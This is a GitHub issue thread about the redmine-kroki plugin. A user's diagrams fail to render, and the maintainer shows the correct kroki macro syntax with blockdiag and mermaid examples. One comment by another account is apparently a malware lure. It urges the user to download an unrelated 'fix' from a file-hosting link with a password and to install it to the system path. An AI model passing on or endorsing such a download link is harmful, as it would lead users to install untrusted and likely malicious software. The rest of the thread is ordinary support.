### ISSUE TITLE
[BUG] Can I ask for help?

### ISSUE THREAD

**Issue by 7K-K-H** [JeffDess/redmine-kroki#7]
**Describe the bug**
I entered sample text into the wiki, but the diagram does not appear.
( I am a beginner developer and apologize for my ignorance. )

**To Reproduce**
1. Input Text in Wiki
" {blockdiag {
  blockdiag -> generates -> "block-diagrams";
  blockdiag -> is -> "very easy!";

  blockdiag [color = "greenyellow"];
  "block-diagrams" [color = "pink"];
  "very easy!" [color = "orange"];
}}

{{kroki(mermaid, theme=dark, font-family=serif)
mermaid
}}
"

**Expected behavior**
Display diagrams 

**Screenshots**
![image](https://github.com/user-attachments/assets/a04cddb6-9306-45f8-8ff0-a138b2dd0fbb)

**Desktop (please complete the following information):**
 - OS: ubuntu 24.04
 - Kroki Server: Docker-Compose
 - Browser: Chrome
 - Redmine version: Redmine 5.1.3.stable
 - Plugin version :  0.25.0 (60d83be) ?

    
**Additional context**
If there is any document I should check, please let me know.

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JeffDess** [comment]
Hi, the syntax error is simply that you didn't put valid markup for your diagram inside the macro. It appears before you open the macro.

So if you want a BlockDiag, you have to write it like this:

```txt
{{kroki(blockdiag)
<Your markup here>
}}
```

In your case:

```txt
{{kroki(blockdiag)
blockdiag {
  Kroki -> generates -> "Block diagrams";
  Kroki -> is -> "very easy!";

  Kroki [color = "greenyellow"];
  "Block diagrams" [color = "pink"];
  "very easy!" [color = "orange"];
}
}}
```

A mermaid example:

```txt
{{kroki(mermaid, theme=dark, font-family=serif)
graph TD
  A[ Anyone ] -->|Can help | B( Go to github.com/yuzutech/kroki )
  B --> C{ How to contribute? }
  C --> D[ Reporting bugs ]
  C --> E[ Sharing ideas ]
  C --> F[ Advocating ]
}}
```

Does that solve your issue @7K-K-H? 
Would you have liked such examples in the docs?

**Comment by JeffDess** [comment]
For reference, you should get something like this: 
![image](https://github.com/user-attachments/assets/4c21d344-2ef7-4718-9d3a-8826fc2837b6)

**Comment by 7K-K-H** [comment]
Thanks,
it work well.
